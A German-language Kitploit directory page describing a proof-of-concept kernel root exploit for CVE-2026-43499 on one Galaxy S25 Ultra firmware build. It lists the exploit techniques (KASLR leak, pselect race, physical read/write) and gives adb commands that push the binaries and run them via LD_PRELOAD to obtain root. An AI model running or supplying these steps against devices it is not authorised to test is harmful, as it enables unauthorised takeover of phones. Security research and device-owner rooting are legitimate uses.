Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-43499-S25U — Eigenständiger PoC für Galaxy S25 Ultra SM-S938N S938NKSUACZF1 | Kitploit
Tools/GitHubGitHub/busung-dev/cve-2026-43499-s25u
Android-SicherheitPrivilege EscalationExploitationPost-ExploitationRed TeamingPayload-EntwicklungBinary-Exploitation
GitHubbusung-dev/cve-2026-43499-s25u

CVE-2026-43499-S25U

Eigenständiger PoC für Galaxy S25 Ultra SM-S938N S938NKSUACZF1

Repository anzeigen
391012vor 2 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-43499 PoC für Galaxy S25 Ultra

Gerätespezifischer Proof of Concept für CVE-2026-43499 auf dem koreanischen Samsung Galaxy S25 Ultra.

Unterstütztes Ziel

Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages

Die Offsets und Strukturlayouts gelten nur für die oben genannte Firmware.

Referenz

Dieser Port basiert auf:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • Upstream revision: b850d3bddc74c3328d5fbcc0568d21962b55d949

Die ursprüngliche Apache-Lizenz 2.0 ist in LICENSE enthalten.

Änderungen des Ports

  • Hinzugefügt die Offsets und Kernel-Layouts für pa3q-S938NKSUACZF1.
  • Tracefs-basierte KASLR-Slide-Wiederherstellung für diesen Samsung-Kernel hinzugefügt.
  • Portierung des pselect-Race, der CFI/FOPS-Stufe und der physischen Lese-/Schreib-Primitive.
  • Gerätespezifischen system_unbound_wq-Root-Pfad des User-Mode-Helpers hinzugefügt.
  • Isolierte Wiederholungsprozesse mit der geräteangepassten pselect-Verzögerungssequenz hinzugefügt.
  • Behält zurückgewonnene Seiten nach Erfolg, um das Recycling von Live-gefälschten Objekten zu vermeiden.

Kompilieren

Setze ANDROID_NDK_HOME auf Android NDK r29 oder eine kompatible Toolchain:

make -j8

Ausgaben:

build/cve-2026-43499
build/cve-2026-43499-root

Bereitstellen und ausführen

adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

Der Exploit verwendet standardmäßig 16 unabhängige Versuche und eine Basis-pselect-Verzögerung von 20.000 Mikrosekunden. Überschreibe diese beim Sammeln von Zeitdaten:

adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"

Die temporäre Root-Sitzung und die zurückbehaltenen Allokationen bestehen bis zum Neustart.

Für die Ein-Klick-Installation und KernelSU-Unterstützung verwende Root My Galaxy.

Nur auf Geräten verwenden, die dir gehören oder für die du ausdrücklich die Erlaubnis zum Testen hast.

Tool herunterladen